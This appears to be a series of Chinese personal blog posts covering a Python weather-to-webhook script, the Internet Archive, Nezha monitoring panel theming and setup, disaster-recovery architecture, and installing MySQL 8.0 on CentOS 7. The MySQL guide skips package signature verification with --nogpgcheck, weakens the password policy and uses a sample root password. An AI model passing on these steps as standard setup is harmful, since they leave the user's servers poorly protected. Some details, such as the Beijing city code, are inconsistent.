    # 构建请求URL，其中city_code是城市代码，用于指定要查询的城市
    url = f"http://t.weather.sojson.com/api/weather/city/{city_code}" 
    # 发送GET请求
    response = requests.get(url)

    # 如果响应状态码不是200（即请求成功），则返回错误信息
    if response.status_code != 200:
        return f"请求失败，状态码：{response.status_code}"

    # 尝试解析响应内容为JSON格式
    try:
        weather_data = response.json()
        # 提取城市名称
        city_name = weather_data['cityInfo']['city']
        # 提取当前温度
        wendu = weather_data['data']['wendu']
        # 提取天气状况
        weather_description = weather_data['data']['forecast'][0]['type']
        # 提取空气质量
        quality = weather_data['data']['quality']
        # 提取PM2.5和PM10
        pm25 = weather_data['data']['pm25']
        pm10 = weather_data['data']['pm10']
        # 提取其他信息
        forecast = weather_data['data']['forecast'][0]['notice']
        # 返回格式化的天气信息字符串
        return f"天气推送 城市：{city_name}\n 当前温度：{wendu}℃\n 天气：{weather_description}\n 空气质量：{quality}\n PM2.5：{pm25}\n PM10：{pm10}\n 预报：{forecast}\n 信息来自中国气象网查询"
    except json.JSONDecodeError as e:
        # 如果JSON解析失败，返回错误信息
        return f"解析JSON失败：{e}"

# 定义一个函数，用于发送POST请求
def send_post_request(content, recipient):
    # 设置请求头，指定内容类型为JSON
    headers = {
        'Content-Type': 'application/json'
    }
    # 构建POST请求的数据，包括接收者、消息类型和内容
    payload = {
        "to": recipient,  # 使用传入的recipient参数作为接收者
        "type": "text",
        "content": content
    }
    # 发送POST请求，并将数据以JSON格式发送
    response = requests.post(webhook_url, headers=headers, data=json.dumps(payload))
    # 打印响应状态码
    print(f"Response status code: {response.status_code}")

# 主函数，程序的入口点
if __name__ == '__main__':
    city_code = '101080913'  # 北京的城市代码
    weather_info = get_weather_data(city_code)
    # 假设接收者名称为"艾米拉特工"
    recipients = ["demo01", "demo02", "demo03"]
    for recipient in recipients:
        # 发送消息给当前的接收者
        send_post_request(weather_info, recipient)

1. 导入模块：

requests：用于发送HTTP请求。

json：用于处理JSON数据。

2. 定义`Webhook URL`：

webhook_url：这是你的Webhook服务的URL，用于接收POST请求。在这个例子中，它指向本地网络的IP地址192.168.1.133上的端口3001。

3. 定义获取天气数据的函数 `get_weather_data(city_code)`：

这个函数接受一个参数city_code，这是城市的天气代码。

使用requests.get发送GET请求到API URL，该URL包含了城市代码。

检查HTTP响应的状态码，如果请求失败，返回错误信息。

解析JSON响应数据，提取城市名称、当前温度、天气状况、空气质量、PM2.5和PM10值，以及预报通知。

return f"天气推送 城市：{city_name}, 当前温度：{wendu}℃, 天气：{weather_description}, 空气质量：{quality}, PM2.5：{pm25}, PM10：{pm10}, 预报：{forecast} 信息来自中国气象网查询"

可以自定义return f内的字符，实现自定义消息文本的效果

如果解析JSON时出现错误，捕获json.JSONDecodeError并返回错误信息。

返回一个包含所有提取信息的字符串。

4. 定义发送POST请求的函数 `send_post_request(content)`：

设置请求头，指定内容类型为pplication/json。

创建一个包含接收者标识、消息类型和内容的字典payload。

使用requests.post发送POST请求到Webhook URL，传递payload作为JSON数据。

打印Webhook服务的响应状态码。

5. 主函数：

设置城市代码city_code为01010100，这是北京的城市代码。

调用get_weather_data函数获取天气信息。

使用一个列表储存接收者的名称,再使用for循环遍历列表，实现给多个接收者发生的功能

调用send_post_request函数将天气信息发送到Webhook。

6. 查询自己城市的代码

其中01010100是城市的代码，获得城市代码进入：
http://www.weather.com.cn

在搜索框上输入你要需要获得天气的城市，点击查询，即可在地址栏获得相应城市编号，然后替换：
http://m.weather.com.cn/data/01010100.html

7. 推送效果

互联网档案计划（Internet Archive）

casearx@foxmail.com (Casear) — Sun, 19 May 2024 14:13:44 GMT

介绍一下这个非常非常重要和有用的"互联网档案计划"。

就像它的名字一样，这个计划的目的就是为互联网保存一份档案。在它的网站上，它这样介绍自己：

Most societies place importance on preserving artifacts of their culture and heritage. Without such artifacts, civilization has no memory and no mechanism to learn from its successes and failures. Our culture now produces more and more artifacts in digital form. The Archive's mission is to help preserve those artifacts and create an Internet library for researchers, historians, and scholars. The Archive collaborates with institutions including the Library of Congress and the Smithsonian.

大多数社会都非常重视保护文化遗存。如果没有这些遗存，那么人类就将失去记忆，无法从过去的经历获得启示。如今，越来越多的文化遗存以数字格式出现。"互联网档案计划"的使命就是保护这些数字遗存，为人类创造一个互联网图书馆。我们的合作单位包括国会图书馆和史密森学会。

都说互联网是有记忆的，弥补人类记忆的短暂。

你有没有想过，很多年前你曾浏览过的网站或某个网页，如今，即使那个网站已经倒闭，页面已经删除，或者，你访问某个网页，页面上显示一个大大的404 --- 因为某种原因页面已经被管理员删除了。

现在，凭着你的记忆，你还可以将它回来，继续浏览。

archive.org 就是这样的一家机构，靠捐款在运营的一家公益组织。

他们在首页上这样介绍自己：

Internet Archive is a non-profit library of millions of free books, movies, software, music, websites, and more.
Internet档案馆是一个非营利性图书馆，包含数百万本免费书籍，电影，软件，音乐，网站等。

保存网站只是他们是他们的功能的一部分。你可以上找面找到无数在中文互联网上已经失传的书籍，短片，论文资料。甚至应用程序

这个服务，很酷的是，到目前为止，它已经保存了8630 亿个网页（截止2024年1月）

在保存内容有：

8630 亿个网页
4100 万册书籍
文本1470万录音（包括240,000场现场音乐会）
840 万个视频（包括 240 万个电视新闻节目）
440 万张图像
890,000 个软件程序

主要特色是其能够以多个时间点快照的方式保存网页。你可以在不同时间点查看特定网页的旧版本，了解在过去某一时刻该网页的内容和布局。时光机：用户可以输入一个网址，然后选择特定日期，以查看在那一天的网页样貌。网页保存：互联网档案馆定期抓取互联网上的网页，将其存档以备将来查看。多媒体资源：除了网页，互联网档案馆还保存了许多其他类型的数字内容，如音频、视频、图像等。文献馆藏：互联网档案馆包含了数百万份数字化的书籍、期刊、音乐和影片等文献。研究资源：研究人员可以使用互联网档案馆的内容进行学术研究，了解互联网发展的历史，也可以访问以前的网络内容以进行比较研究。免费访问：大部分互联网档案馆的内容都是免费提供的，任何人都可以访问。

目前，"互联网档案计划"分为六大部分：

一、电子书

网址：http://www.archive.org/details/texts

这个部分，我以前已经介绍过了，它专门收集公共领域的书籍和文档，任何人都可以免费下载。截至到今天，共有29万多种材料，堪称互联网上最好的公共领域图书搜索引擎。

它主要收集英语书籍，但也包括少部分其他语种的书籍，比如朱熹的《论语集注》。

二、网页

网址：http://www.archive.org/web/web.php

这个部分有个专门的名字，叫做"时光倒流机器"（Wayback Machine），它像收集旧报纸那样收集旧网页。举例来说，Yahoo!的首页就有5000多份档案，最早的可以回溯到1996年10月17日，最近的则是2007年8月30日。

要将全世界的网页都保存下来，这需要多大的存储容量啊？根据2006年的统计，当时Wayback Machine的存储容量有2000T，然后还在以每月20T的速度增加。

三、视频

网址：http://www.archive.org/details/movies

这个部分收集视频材料，你在其中可以找到动画片和电影。我感觉内容还不算很丰富，不过在其中经常可以找到有趣的内容，比如《如果抵御僵尸的袭击？》和1951年的好莱坞喜剧片《皇家婚礼》。

四、音频

网址：http://www.archive.org/details/audio

音频材料主要是有声书籍和音乐。比如，你可以免费下载世界名著《简爱》的MP3，以及巴赫的《 C小調第4奏鸣曲》等等。

五、软件

网址：http://www.archive.org/details/software

软件也是人类文化的一部分，保存旧软件同保存旧书一样，都是很有意义的。我在上面发现了Photoshop 6.0的DEMO版和Winamp 5.0。

六、教育材料

网址：http://www.archive.org/details/arsdigita

这部分主要是美国大学课程，有视频和文字材料下载，相当于不去北美就可以上那里的课，比如麻省理工学院的《微分方程》和Naropa大学的《艾伦·金斯堡的诗歌》。

NEZHA监控面板美化

casearx@foxmail.com (Casear) — Sun, 19 May 2024 14:13:22 GMT

使用方法

前后台主题设为默认，然后将下面的自定义代码粘贴进去即可

替换默认首页LOGO和底部版权

Logo和版权-->
<script>
window.onload = function(){
var avatar=document.querySelector(".item img")
var footer=document.querySelector("div.is-size-7")
footer.innerHTML="奶妈监控面板 and 我扒的CSS"
footer.style.visibility="visible"
avatar.src="https://ii.do/favicon.ico"
avatar.style.visibility="visible"
}
script>

替换默认Favicon

var faviconurl="//img14.360buyimg.com/ddimg/jfs/t1/162473/22/23012/3692/6184b06aEa95a0194/8c51cebbd04b95b2.png";
var link = document.querySelector("link[rel*='icon']") || document.createElement('link');
link.type = 'image/png';
link.rel = 'shortcut icon';
link.href = faviconurl;
document.getElementsByTagName('head')[0].appendChild(link);

1. 背景图片使用本站图床，半透明样式

2. 半透明风格（右上角详情页有轻微bug）

3. 暖色

/* 屏幕适配 */
@media only screen and (min-width: 1200px) {
    .ui.container {
    width: 80% !important;
}
}

@media only screen and (max-width: 767px) {
    .ui.card>.content>.header:not(.ui), .ui.cards>.card>.content>.header:not(.ui) {
        margin-top: 0.4em !important;
    }
}

/* 整体图标 */
i.icon {
    color: #000;
    width: 1em !important;
}

/* 背景图片 */
body {
    content: " " !important;
    background: fixed !important;
    z-index: -1 !important;
    top: 0 !important;
    right: 0 !important;
    bottom: 0 !important;
    left: 0 !important;
    background-position: top !important;
    background-repeat: no-repeat !important;
    background-size: cover !important;
    background-image: url(https://www.yiyangv.cn/other/tx.jpg) !important;
    font-family: Arial,Helvetica,sans-serif !important;
}
/* 进度条 */
.ui.progress {
    border-radius: 0.5rem !important;
}

.ui.progress .bar {
    min-width: 1.8em !important;
    border-radius: 0.5rem !important;
    line-height: 1.65em !important;
}

.ui.fine.progress> .bar {
    
}

.ui.progress> .bar {
   
}

.ui.progress.fine .bar {
    
}

.ui.progress.warning .bar {
    
}

.ui.progress.error .bar {
    
}

.ui.progress.offline .bar {
    
}
/* 导航栏 */
.ui.large.menu {
    border: 0 !important;
    border-radius: 0rem !important;
    background-color: rgba(255, 255, 255, 55%) !important;
}

/* 首页按钮 */
.ui.menu .active.item {
    background-color: transparent !important;
}

/* 导航栏下拉框 */
.ui.dropdown .menu {
    border: 0 !important;
    border-radius: 1rem !important;
    background-color: rgba(255, 255, 255, 80%) !important;
}

/* 登陆按钮 */
.nezha-primary-btn {
    background-color: transparent !important;
    color: #000 !important;
}

/* 大卡片 */
#app .ui.fluid.accordion {
    background-color: #fbfbfb26 !important;
    border-radius: 1rem !important;
}

/* 小卡片 */
.ui.four.cards>.card {

    background-color: #fafafaa3 !important;
    border-radius: 1rem !important;
}

.status.cards .wide.column {
    padding-top: 0 !important;
    padding-bottom: 0 !important;

}

.status.cards .three.wide.column {

}

.status.cards .wide.column:nth-child(1) {

}

.status.cards .wide.column:nth-child(2) {

}

.status.cards .description {

}

/* 小鸡名 */
.status.cards .flag {
    margin-right: 0.5rem !important;
}



/* 上传下载 */
.status.cards .outline.icon {
    margin-right: 1px !important;
}

i.arrow.alternate.circle.down.outline.icon {
    color: #21ba45 !important;
}

i.arrow.alternate.circle.up.outline.icon {
    color: red !important;
}
/* 弹出卡片小箭头 */
.ui.right.center.popup {
    margin: -3px 0 0 0.914286em !important;
    -webkit-transform-origin: left 50% !important;
    transform-origin: left 50% !important;
}

.ui.bottom.left.popup {
    margin-left: 1px !important;
    margin-top: 3px !important;
}

.ui.top.left.popup {
    margin-left: 0 !important;
    margin-bottom: 10px !important;
}

.ui.top.right.popup {
    margin-right: 0 !important;
    margin-bottom: 8px !important;
}

.ui.left.center.popup {
    margin: -3px .91428571em 0 0 !important;
    -webkit-transform-origin: right 50% !important;
    transform-origin: right 50% !important;
}

.ui.right.center.popup:before,
.ui.left.center.popup:before {
    border: 0px solid #fafafaeb !important;
    background: #fafafaeb !important;
}

.ui.top.popup:before {
    border-color: #fafafaeb transparent transparent !important;
}

.ui.popup:before {
    border-color: #fafafaeb transparent transparent !important;
}

.ui.bottom.left.popup:before {
    border-radius: 0 !important;
    border: 1px solid transparent !important;
    border-color: #fafafaeb transparent transparent !important;
    background: #fafafaeb !important;
    -webkit-box-shadow: 0px 0px 0 0 #fafafaeb !important;
    box-shadow: 0px 0px 0 0 #fafafaeb !important;
    -webkit-tap-highlight-color: rgba(0,0,0,0) !important;
}

.ui.bottom.right.popup:before {
    border-radius: 0 !important;
    border: 1px solid transparent !important;
    border-color: #fafafaeb transparent transparent !important;
    background: #fafafaeb !important
    -webkit-box-shadow: 0px 0px 0 0 #fafafaeb !important;
    box-shadow: 0px 0px 0 0 #fafafaeb !important;
    -webkit-tap-highlight-color: rgba(0,0,0,0) !important;
}

.ui.top.left.popup:before {
    border-radius: 0 !important;
    border: 1px solid transparent !important;
    border-color: #fafafaeb transparent transparent !important;
    background: #fafafaeb !important;
    -webkit-box-shadow: 0px 0px 0 0 #fafafaeb !important;
    box-shadow: 0px 0px 0 0 #fafafaeb !important;
    -webkit-tap-highlight-color: rgba(0,0,0,0) !important;
}

.ui.top.right.popup:before {
    border-radius: 0 !important;
    border: 1px solid transparent !important;
    border-color: #fafafaeb transparent transparent !important;
    background: #fafafaeb !important;
    -webkit-box-shadow: 0px 0px 0 0 #fafafaeb !important;
    box-shadow: 0px 0px 0 0 #fafafaeb !important;
    -webkit-tap-highlight-color: rgba(0,0,0,0) !important;
}

.ui.left.center.popup:before {
    border-radius: 0 !important;
    border: 1px solid transparent !important;
    border-color: #fafafaeb transparent transparent !important;
    background: #fafafaeb !important;
    -webkit-box-shadow: 0px 0px 0 0 #fafafaeb !important;
    box-shadow: 0px 0px 0 0 #fafafaeb !important;
    -webkit-tap-highlight-color: rgba(0,0,0,0) !important;
}

/* 弹出卡片 */
.status.cards .ui.content.popup {
    min-width: 20rem !important;
    line-height: 2rem !important;
    border-radius: 1rem !important;
    border: 1px solid transparent !important;
    background-color: #fafafaeb !important;
    font-family: Arial,Helvetica,sans-serif !important;
}

.ui.content {
    margin: 0 !important;
    padding: 1em !important;
}
/* 服务页 */
.ui.table {
    background: RGB(225,225,225,0.6) !important;
    border-radius: 1rem !important;
}

.ui.table thead th {
    background: transparent !important;
}

/* 服务页进度条 */
.service-status .good {
    
}

.service-status .danger {
    
}

.service-status .warning {
    
}

/* 版权 */
.ui.inverted.segment, .ui.primary.inverted.segment {
    color: #000 !important;
    font-weight: bold !important;
    background-color: #fafafaa3 !important;
}


--Logo和版权-->

4. 绿色风格

```css
```

哪吒监控配置

casearx@foxmail.com (Casear) — Sun, 19 May 2024 14:12:09 GMT

准备工作

搭建一个哪吒监控，你需要：

一台可以连接公网的 VPS，防火墙和安全策略需要放行 8008 和 5555 端口，否则会无法访问和无法接收数据。单核 512MB 内存的服务器配置就足以满足大多数使用场景
一个已经设置好 A 记录，指向 Dashboard 服务器 ip 的域名
:::tip{title="TIP"}
如果你想使用 CDN，请准备两个域名，一个配置好 CDN 用作公开访问，CDN 需要支持WebSocket 协议；另一个域名不要使用 CDN，用作 Agent 端与 Dashboard 的通信
本文档分别以 "cdn.example.com" 和 "data.example.com" 两个域名来演示
:::
一个 Github 账号（或：Gitlab、Jihulab、Gitee）
:::tip{title="TIP"}
如果您位于中国大陆，访问 Github 有困难，我们建议您选择 Jihulab 作为 OAuth 提供商
:::
本文档将以宝塔面板反代面板的过程作为范例，随着未来版本的变化，部分功能的入口可能会发生改变，本文档仅供参考
:::info{title="相关信息"}
本项目并不依赖宝塔，你可以选择使用你喜欢的任何服务器面板，如果你能力足够，可以手动安装 NginX 或 Caddy 来配置 SSL 和反代。
如果你认为没有必要使用 80、443 端口来访问 Dashboard，你甚至不需要安装 NginX 就可以直接使用安装脚本。
:::

获取 Github/Jihulab 的 Client ID 和密钥

哪吒监控接入 Github、Gitlab、Jihulab、Gitee 作为后台管理员账号

首先我们需要新建一个验证应用，以 Github 为例，登录 Github 后，打开 https://github.com/settings/developers ，依次选择“OAuth Apps” - “New OAuth App”
Application name - 随意填写
Homepage URL - 填写面板的访问域名，如："http://cdn.example.com"
Authorization callback URL - 填写回调地址，如："http://cdn.example.com/oauth2/callback"
点击 “Register application”
保存页面中的 Client ID，然后点击 “Generate a new client secret“，创建一个新的 Client Secret，新建的密钥仅会显示一次，请妥善保存
JihuLab 的应用创建入口为：https://jihulab.com/-/profile/applications
Redirect URL 中应填入回调地址
在下方范围中勾选 read_user 和 read_api
创建完成后，保存好应用程序 ID 和密码

在服务器中安装哪吒监控面板端

在面板服务器中，运行安装脚本：

chmod +x nezha.sh && sudo ./nezha.sh

如果你的面板服务器位于中国大陆，可以使用镜像：

chmod +x nezha.sh && sudo CN=true ./nezha.sh

等待Docker安装完毕后，分别输入以下值：
OAuth提供商 - Github，Gitlab，Jihulab，Gitee 中选择一个

Client ID - 之前保存的 Client ID

Client Secret - 之前保存的密钥

用户名 - OAuth 提供商中的用户名

站点标题 - 自定义站点标题

访问端口 - 公开访问端口，可自定义，默认 8008

Agent的通信端口 - Agent与Dashboard的通信端口，默认 5555
输入完成后，等待拉取镜像
安装结束后，如果一切正常，此时你可以访问域名+端口号，如 “http://cdn.example.com:8008” 来查看面板
将来如果需要再次运行脚本，可以运行：
来打开管理脚本
```
#PROXY-START/
location / {
    proxy_pass http://127.0.0.1:8008;
    proxy_set_header Host $http_host;
    proxy_set_header      Upgrade $http_upgrade;
}
location ~ ^/(ws|terminal/.+)$  {
    proxy_pass http://127.0.0.1:8008;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "Upgrade";
    proxy_set_header Host $http_host;
}
#PROXY-END/
```
- 点击“保存”
  现在，你应该可以直接使用域名，如：“http://cdn.example.com“ 来访问面板了
在宝塔面板中配置 SSL
首先，先暂时关闭反向代理
正如在其他网站中配置 SSL 证书一样，进入站点设置中的 “SSL”，你可以选择自动申请 Let´s Encrypt 证书或手动配置已有的证书
完成 SSL 的设置后，你需要回到 https://github.com/settings/developers ，编辑之前创建的验证应用程序，将之前我们填入的 "Homepage URL" 和 "Authorization callback URL" 中的域名全部从http改为https，如："https://cdn.example.com" 和 "https://cdn.example.com/oauth2/callback" ，不更改此项可能会导致你无法登录面板后台

设置面板

在管理后台中新增服务器

设置服务器监控服务
- 名称（随意）
- 目标
  1. 类型为 HTTP-GET 时输入URL(带 http/https, HTTPS协议的会顺带监控SSL证书)；
  2. 类型为 ICMP-Ping 时输入域名/IP，不带端口；
  3. 类型为 TCP-Ping 时输入域名/IP + 端口号：example.com:22
- 类型
  1. HTTP-GET（可以一起监控ssl证书）
  2. ICMP-Ping（直接检测连通性）
  3. TCP-Ping（测试端口连通性）
- 请求间隔（秒）
- 覆盖范围（默认即可）
- 特定服务器（选择服务器ID）
- 通知方式组（在下一节中的告警方式中提前设置）
- 故障通知（同样使用告警设置）
- 最大延迟（设置服务器最大监控的ms）
- 最小延迟（在最大延长和最小延迟中的区间高即为不正常，低即为正常）
任务

告警

灵活的通知方式

在面板消息中，占位符 #DATETIME#代表事件发生的时间戳。当通知被触发时，面板会自动将 #DATETIME#替换为事件的实际时间。

#NEZHA#是面板消息占位符，面板触发通知时会自动用实际消息替换占位符

Body内容是JSON 格式的：当请求类型为 FORM 时，值为 key:value 的形式，value 里面可放置占位符，通知时会自动替换。当请求类型为 JSON 时只会简单进行字符串替换后直接提交到URL。

Server 酱示例

名称：Server 酱

URL：https://sc.ftqq.com/你的key.send?title=哪吒报警信息&desp=#NEZHA#

请求方式: GET

请求类型: 默认

Body: 空

Server 酱进阶

名称：Server 酱

URL：https://sc.ftqq.com/你的key.send

请求方式: POST

请求类型: FORM

Body:
```
{
 "title": "#SERVER.NAME#",
 "desp":"**#NEZHA#\n\n
 平均负载: \"#SERVER.LOAD1#\",\"#SERVER.LOAD5#\",\"#SERVER.LOAD15#\"\n\n
 ## [点击访问面板](https://你的面板域名)\n\n
 ![logo](https://raw.githubusercontent.com/naiba/nezha/master/resource/static/brand.svg)"
}
```
演示

server酱通知展示

告警规则说明

基本规则

type：可选取一个或多个类型，如在一个规则中选择了多个类型，需要同时满足所有选择的类型才会触发通知（可参考后面的示例）

cpu、memory、swap、disk

net_in_speed 入站网速、net_out_speed 出站网速、net_all_speed 双向网速、transfer_in 入站流量、transfer_out 出站流量、transfer_all 双向流量

offline 离线监控

load1、load5、load15 负载

process_count 进程数目前取线程数占用资源太多，暂时不支持

tcp_conn_count、udp_conn_count 连接数

duration：持续数秒，数秒内采样记录 30% 以上触发阈值才会报警（防数据插针）

min 或 max：

流量、网速类数值为字节（1KB=1024B，1MB = 1024*1024B）

内存、硬盘、CPU 以占用百分比计数

离线监控无需设置此项

cover：

0 监控所有，通过 ignore 忽略特定服务器

1 忽略所有，通过 ignore 监控特定服务器

报警规则分享

名称：离线报警

规则：[{"Type":"offline","Duration":10}] 解释：每10s坚持一次，如果离线会发通知。（10s感觉太短，我改成600，也就是10分钟感觉比较合适）

名称：CPU过高警告

规则：[{"type":"cpu","max":90,"duration":300}] 解释：CPU超过90%发通知警告。300s一周期。（90和300自行修改为自己合适）

名称：内存过高警告

规则：[{"type":"memory","max":90,"duration":300}] 解释：内存占用超过90%发通知警告，300s一周期。（90和300自行修改为自己合适）

名称：硬盘即将爆满

规则：[{"type":"disk","max":80,"duration":43200}] 解释：硬盘占用超过80%发通知警告，12小时一周期。（80和43200自行修改为自己合适）

名称：TCP链接过多异常

规则：[{"type":"tcp_conn_count","max":20,"duration":300}] 解释：TCP链接数超过20个发通知报警，300s为周期。

名称：出站网速过快警告

规则：[{"type":"net_out_speed","max":524288000,"duration":300}] 解释：出站网速超过500M警告发通知，周期为300s。（524288000和300自行修改为自己合适）

名称：周期内流量警告

规则：
[{"type":"transfer_out_cycle","max":1099511627776,"cycle_start":"2022-01-01T00:00:00+08:00","cycle_interval":1,"cycle_unit":"month","cover":1,"ignore":{"3":true,"4":true}}]

解释：ID 为 3 和 4 的服务器（ignore 里面定义），以每月 1 号为统计周期，周期内统计的出站月流量达到 1TB 时报警
- type之中transfer_out_cycle表示周期内的入站流量。大家可以修改为transfer_out_cycle 周期内的出站流量、 transfer_all_cycle 周期内双向流量和
- max之后的1099511627776为1TB流量，这里使用的单位应该是B，大家可以自行修改。如：200GB为214748364800
- cycle_start: 是统计周期开始日期（可以是你机器计费周期的开始日期），时间格式为RFC3339，例如北京时间为2022-01-11T08:00:00.00+08:00
- cycle_interval：每隔多少个周期单位（例如，周期单位为天，该值为 7，则代表每隔 7 天统计一次）
- cycle_unit 统计周期单位，默认hour,可选(hour, day, week, month, year)
- cover参考基本规则【0 监控所有，通过 ignore 忽略特定服务器、1 忽略所有，通过 ignore 监控特定服务器】
- ignore内定义要监控的VPS 的ID。
安装被控端

在服务器界面负责一键安装代码，直接复制到被监控端直接运行即可

但是国内的服务器无法正常安装哪吒探针，即使是脚本提供的国产镜像也不行

探针下载

根据服务器选择合适的版本下载，下载完后是一个二进制代码文件，无后缀
```
NZ_BASE_PATH="/opt/nezha"
NZ_AGENT_PATH="${NZ_BASE_PATH}/agent"
NZ_AGENT_SERVICE="/etc/systemd/system/nezha-agent.service"

1. "/opt/nezha" 为面板核心的存放目录，包括Dashboard 和 Agent

2. "/opt/nezha/agent" 结合上文，此目录就为代理端核心文件的存放位置

3. "/etc/systemd/system/nezha-agent.service" 
    对Liunx系统比较熟悉的小伙伴就会知道这个文件决定的哪吒代理端的开机启动
```
根据上述内容判断出核心存放目录和存放位置

操作步骤
1. 在服务器上创建“/opt/nezha/agent”目录，将nezha-agent放入
2. 在“/etc/systemd/system/”目录新建一个nezha-agent.service文件，将完成替换的代码保存进其中
```
[Unit]
Description=Nezha Agent
After=syslog.target
#After=network.target
#After=nezha-dashboard.service

[Service]
# Modify these two values and uncomment them if you have
# repos with lots of files and get an HTTP error 500 because
# of that
###
#LimitMEMLOCK=infinity
#LimitNOFILE=65535
Type=simple
User=root
Group=root
WorkingDirectory=/opt/nezha/agent/
ExecStart=/opt/nezha/agent/nezha-agent -s IP地址:5555 -p 密钥
Restart=always
#Environment=DEBUG=true

# Some distributions may not support these hardening directives. If you cannot start the service due
# to an unknown option, comment out the ones not supported by your version of systemd.
#ProtectSystem=full
#PrivateDevices=yes
#PrivateTmp=yes
#NoNewPrivileges=true

[Install]
WantedBy=multi-user.target
```
3. 最后在脚本中重新更改探针配置后重启即可上线

异地容灾备份系统两地三中心

casearx@foxmail.com (Casear) — Wed, 17 Jan 2024 03:12:14 GMT

两地三中心：异地容灾备份的先进方案

在数据日益重要的今天，确保数据的安全与完整是企业的核心任务。

为此，异地容灾备份系统两地三中心架构提供了一种强大而可靠的解决方案。

两地三中心包括一个生产中心、一个同城灾备中心和一个异地灾备中心。这种架构不仅确保数据安全，还能在灾难发生时快速恢复业务。

数据通过硬件复制、虚拟化复制或存储复制等技术实时或近实时地备份至两个灾备中心，大大提高了数据的可用性和完整性。同时，网络连接的稳定性和带宽也至关重要，以确保数据的一致性和完整性。

选择合适的硬件和存储设备，以及建立完善的监控和维护机制也是关键。此外，制定详细的灾难恢复计划并定期进行演练，可以确保在灾难发生时能够快速、准确地恢复数据。

随着技术的不断进步，企业应持续更新两地三中心架构以应对新的挑战和需求。总的来说，异地容灾备份系统两地三中心是一种高效、可靠的灾难恢复解决方案，能够确保企业的数据安全和业务连续性。

转载关于躺平

casearx@foxmail.com (Casear) — Mon, 08 Jan 2024 09:05:09 GMT

CentOS7安装MySQL8.0

casearx@foxmail.com (Casear) — Sun, 19 May 2024 14:11:37 GMT

下载rpm安装在线安装包

直接在linux上下载在线安装包

wget https://repo.mysql.com//mysql80-community-release-el7-3.noarch.rpm

也可以在自己电脑上先下载mysql.rpm文件再上传到linux服务器上

下载地址https://dev.mysql.com/downloads/

挑选合适的系统版本

mysql rpm包依赖源

上面wget下载完成后，执行下面的命令确定依赖源。

sudo yum -y localinstall mysql80-community-release-el7-3.noarch.rpm

sudo以管理员权限运行命令。
yum这是CentOS中的包管理器，用于安装、更新和删除软件包。
localinstall这是yum命令的一个选项，表示从本地安装软件包。
mysql80-community-release-el7-3.noarch.rpm这是MySQL 8 RPM文件的名称。

安装rpm包

rpm -ivh mysql80-community-release-el7-3.noarch.rpm

rpm：RPM（Red Hat Package Manager）是Red Hat及类似系统（如CentOS、Fedora等）上的软件包管理器。它用于安装、卸载、更新、查询和验证软件包。
-ivh：这是rpm命令的选项，每个字母代表一个操作：
- i 代表安装（install）。
- v 代表详细输出（verbose）。这意味着在安装过程中，会显示详细的信息，有助于了解安装的进度和可能出现的问题。
- h 代表显示安装进度（hash mark progress）。在软件包安装时，它会显示一个进度条，以#字符的形式表示进度。
mysql80-community-release-el7-3.noarch.rpm：这是要安装的软件包的名称。从名称可以看出，这是MySQL 8的社区版，并且是为CentOS/RHEL 7制作的。其中，“noarch”表示这个包不是为特定的硬件架构制作的，而是可以在任何架构上安装。

安装MySql

yum install mysql-server

yum：这是CentOS和其他基于Red Hat的Linux发行版中的默认包管理器。它用于从指定的软件仓库中自动安装、升级、配置甚至删除软件包，解决了软件包之间的依赖关系问题。
install：这是yum命令的一个选项，表示要安装一个或多个软件包。
mysql-server：这是要安装的软件包的名称，代表MySQL的服务器软件。

运行的时候有要输入的地址全部填y即可

:::tip{title="提示"}
遇到Failing package is:mysql-community-icu-data-files-8.0.29-1.el7.x86_64 GPG Keys are configured as（公钥未安装）问题时在yum install 版本后面加上 --nogpgcheck，即可绕过GPG验证成功安装
:::

yum install mysql-community-server --nogpgcheck

--nogpgcheck：这是一个参数，指示yum在安装过程中不进行GPG（GNU Privacy Guard）检查。GPG是一种加密软件，用于保护数据的完整性和机密性。在默认情况下，yum在安装软件包时会进行GPG检查，以确保软件包的完整性和来源的可靠性。但是，有时候由于某些原因，例如源key错误，GPG检查可能会失败，导致安装失败。添加--nogpgcheck参数可以跳过GPG检查，使安装继续进行。

服务安装、启动

启动mysql命令：

systemctl start mysqld

开机启动命令：

systemctl enable mysqld

systemctl daemon-reload

systemctl enable mysqld：这个命令将MySQL的服务在系统启动时设置为自动启动。这意味着每次系统启动时，MySQL服务也会自动启动。

systemctl daemon-reload：这个命令会重新加载systemd守护进程的配置文件，以使最新的配置生效。当你修改了systemd服务的配置文件后，通常需要运行这个命令来使更改生效。

验证

查看mysql服务运行状态

service mysqld status

:::tip{title="提示"}
在执行service mysqld status时，系统会通过调用相关的系统命令来检查MySQL服务的状态。如果MySQL服务正在运行，命令将返回关于服务的信息，例如服务的进程ID（PID）和已运行的时间等。这些信息可以提供关于MySQL服务当前状态的详细信息。

如果MySQL服务没有运行，命令将返回服务未运行的消息。这表示MySQL服务器没有在当前系统上运行。
:::

查看3306端口是否启动，如果启动了则表示mysql处于运行状态。

netstat -anp|grep 3306

:::tip{title="提示"}
netstat -anp 是一个命令，用于显示网络连接的详细信息。-a 参数显示所有连接和监听端口，-n 参数显示地址和端口号而不是尝试解析它们，-p 参数显示哪个进程正在使用连接。

grep 3306 是用来在netstat的输出中查找端口号3306的记录。
:::

登录MySQL

查看在日志中的MySQL初始密码

grep "A temporary password" /var/log/mysqld.log

:::tip{title="提示"}
grep "A temporary password" /var/log/mysqld.log 是在 /var/log/mysqld.log 日志文件中搜索包含 "A temporary password" 的行
:::

使用初始密码登录mysql

mysql -u root -p

会提示输入密码，密码在输入时不会显示，建议直接复制粘贴

修改初始密码

ALTER USER 'root'@'localhost' IDENTIFIED BY 'MySQL@123';

:::note{title="注"}
注意8位数以上和种类至少大+写+小写+符号+数字
:::

更改密码复杂程度

因为mysql的密码设置的太复杂不太好记，这里把密码设置的简单一点

先看看当前的密码验证策略

输入：SHOW VARIABLES LIKE 'validate_password.%';

策略说明:

validate_password.length 是密码的最小长度，默认是8，我们把它改成6
输入：set global validate_password.length=6;
validate_password.policy 验证密码的复杂程度，我们把它改成0
输入：set global validate_password.policy=0;
validate_password.check_user_name 用户名检查，用户名和密码不能相同，我们也把它关掉
输入：set global validate_password.check_user_name=off;

远程连接mysql

连接服务器: mysql -u root -p
看当前所有数据库：show databases;
进入mysql数据库：use mysql;
查看mysql数据库中所有的表：show tables;
查看user表中的数据：select host, user, authentication_string, plugin from user;

:::note{title="注"}

从user表中选取host、user、authentication_string和plugin这四个字段的所有记录。
各个字段的意义如下：
